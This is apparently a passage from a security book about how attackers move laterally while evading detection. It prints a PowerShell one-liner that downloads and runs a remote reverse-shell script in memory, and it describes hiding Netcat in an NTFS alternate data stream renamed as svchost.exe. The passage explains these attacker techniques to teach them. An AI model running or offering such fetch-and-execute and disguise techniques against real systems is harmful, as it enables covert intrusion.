The attacker needs to avoid raising alarms at this stage. If network administrators detect that there is a threat on the network, they will thoroughly sweep through it and thwart any progress that the attacker will have made. Many organizations spend a substantial amount of money on security systems to nab attackers. Security tools are increasingly becoming more effective, and they can identify many signatures of hacking tools and malware that hackers have been using. This, therefore, calls for attackers to act wisely. There has been a trend in attackers using legitimate tools for lateral movement. These are tools and techniques that are known by the system or that belong to a system and therefore do not generally pose a threat. Security systems, therefore, ignore them since they are legitimate. These tools and techniques have enabled attackers to move around in highly secured networks right under the noses of security systems.

The following is an example of how attackers can avoid detection by using PowerShell. It will be seen that, instead of downloading a file, which would be scanned by the target's antivirus system, PowerShell is used. It directly loads a PS1 file from the internet instead of downloading then loading:

PS > IEX (New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1')

Such a command will prevent the file that is being downloaded from being flagged by antivirus programs. Attackers can also take advantage of alternate data streams (ADS) in a Windows NT file system ( NTFS)to avoid alerts. By using ADS, attackers can hide their files in legitimate system files, which can be a great strategy for moving between systems. The following command is going to fork Netcat (https://github.com/diegocr/netcat) into a valid Windows utility called Calculator (calc.exe) and change the filename (nc.exe) to svchost.exe. This way the process name won't raise any flags since it is part of the system:

If you simply use the dir command to list all files in this folder, you won't see the file. However, if you use the streams tool from Sysinternals, you will be able to see the entire name as follows: